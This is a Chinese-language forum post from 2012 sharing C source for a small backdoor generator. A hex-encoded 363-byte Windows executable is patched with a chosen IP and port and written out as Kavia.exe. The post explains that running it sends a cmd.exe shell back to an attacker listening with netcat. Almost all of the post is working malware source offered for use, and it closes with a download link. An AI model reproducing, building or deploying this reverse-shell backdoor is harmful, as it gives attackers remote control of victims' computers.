作者:
半斤八兩
博客:
http://hi.baidu.com/bjblcracked
日期:
2012-11-16 02:01- 瑞士军刀nc你知道嗎?用那個工具監聽本地端口,就能得到CMDSHELL
複製代碼
- #include <stdio.h>
- #include <windows.h>
- #define OFFSET_IP 98
- #define OFFSET_PORT 221
- #define OFFSET_BUFFER_SIZE 363
- UCHAR szBackDoor[] = {
- 0x4D, 0x5A, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x00, 0x00, 0x77, 0x73, 0x32, 0x5F,
- 0x33, 0x32, 0x2E, 0x44, 0x4C, 0x4C, 0x00, 0x00, 0x46, 0x00, 0x0F, 0x01, 0x0B, 0x01, 0x68, 0x0C,
- 0x00, 0x40, 0x00, 0xE8, 0x53, 0x1D, 0x40, 0x7C, 0x90, 0x90, 0xEB, 0x24, 0x1E, 0x00, 0x00, 0x00,
- 0x6A, 0x00, 0xEB, 0x1C, 0xAC, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x04, 0x00, 0x00, 0x00,
- 0x04, 0x00, 0x00, 0x00, 0xB2, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xEB, 0x10, 0x04, 0x00, 0x00, 0x00,
- 0xEB, 0x62, 0x00, 0x00, 0x77, 0xC3, 0x00, 0x00, 0x62, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xEB, 0xD0,
- 0x02, 0x00, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x63, 0x6D, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x81, 0xEC, 0xF4, 0x01, 0x00, 0x00, 0x56, 0x8D, 0x44, 0x24, 0x68, 0x57,
- 0x50, 0x68, 0x02, 0x02, 0x00, 0x00, 0xE8, 0x8A, 0x69, 0x62, 0x71, 0x6A, 0x00, 0x6A, 0x00, 0x6A,
- 0x00, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0xE8, 0x8E, 0x8A, 0x62, 0x71, 0x68, 0x3E, 0x03, 0x00,
- 0x00, 0x8B, 0xF0, 0x66, 0xC7, 0x44, 0x24, 0x0C, 0x02, 0x00, 0xE8, 0x64, 0x2D, 0x62, 0x71, 0x68,
- 0x62, 0x00, 0x40, 0x00, 0x66, 0x89, 0x44, 0x24, 0x0E, 0xE8, 0xE3, 0x2D, 0x62, 0x71, 0x8D, 0x4C,
- 0x24, 0x08, 0x6A, 0x10, 0x51, 0x56, 0x89, 0x44, 0x24, 0x18, 0xE8, 0xF8, 0x48, 0x62, 0x71, 0xB9,
- 0x11, 0x00, 0x00, 0x00, 0x33, 0xC0, 0x8D, 0x7C, 0x24, 0x18, 0x8D, 0x54, 0x24, 0x5C, 0xF3, 0xAB,
- 0x66, 0x89, 0x44, 0x24, 0x48, 0x8D, 0x44, 0x24, 0x18, 0x52, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A,
- 0x00, 0x6A, 0x01, 0x6A, 0x00, 0x6A, 0x00, 0x68, 0x80, 0x00, 0x40, 0x00, 0x6A, 0x00, 0xC7, 0x44,
- 0x24, 0x40, 0x44, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x6C, 0x01, 0x01, 0x00, 0x00, 0x89, 0xB4,
- 0x24, 0x80, 0x00, 0x00, 0x00, 0x89, 0x74, 0x24, 0x7C, 0x89, 0x74, 0x24, 0x78, 0xE8, 0x09, 0x22,
- 0x40, 0x7C, 0x5F, 0x5E, 0x81, 0xC4, 0xF4, 0x01, 0x00, 0x00, 0xC3
- };
複製代碼- int main(int argc,char *argv[])
- {
- FILE *tagFile;
- CHAR szIP[15] = {0};
- int nPort = 0;
- system("color 0a & title 正向连接后门 By 半斤八兩");
- puts("KaviaKaviaKaviaKaviaKaviaKaviaKaviaKaviaKaviaK");
- puts("a a");
- puts("v 正向连接 (仅有363 Byte) v");
- puts("i 仅以此后门送给 [Kavia] i");
- puts("a By 半斤八兩 a");
- puts("K http://hi.baidu.com/bjblcracked K");
- puts("a a");
- puts("KaviaKaviaKaviaKaviaKaviaKaviaKaviaKaviaKaviaK");
- puts("");
- if(argc != 3)
- {
- puts("格式: Kavia.exe 你的IP 以及你的端口\r\n");
- system("Pause");
- return -1;
- }
- strcpy(szIP, argv[1]);
- nPort = atoi(argv[2]);
- ZeroMemory(szBackDoor + OFFSET_IP, sizeof(szIP));
- memcpy(szBackDoor + OFFSET_IP, szIP, strlen(szIP));
- memcpy(szBackDoor + OFFSET_PORT, &nPort, sizeof(int));
- tagFile = fopen("Kavia.exe", "w");
- fwrite(szBackDoor, OFFSET_BUFFER_SIZE, 1, tagFile);
- puts("");
- puts("恭喜! 生成成功 文件名[Kavia.exe] *^_^* !!!");
- puts("请用瑞士军刀之类的工具, 监听本地端口...");
- puts("注意, 要在WAN中监听, 不要在LAN环境中一阵乱监听 -_-~...");
- puts("");
- fclose(tagFile);
- return 0;
- }
複製代碼 下載地址:
http://bbs.pediy.com/showthread.php?p=1126348#post1126348
|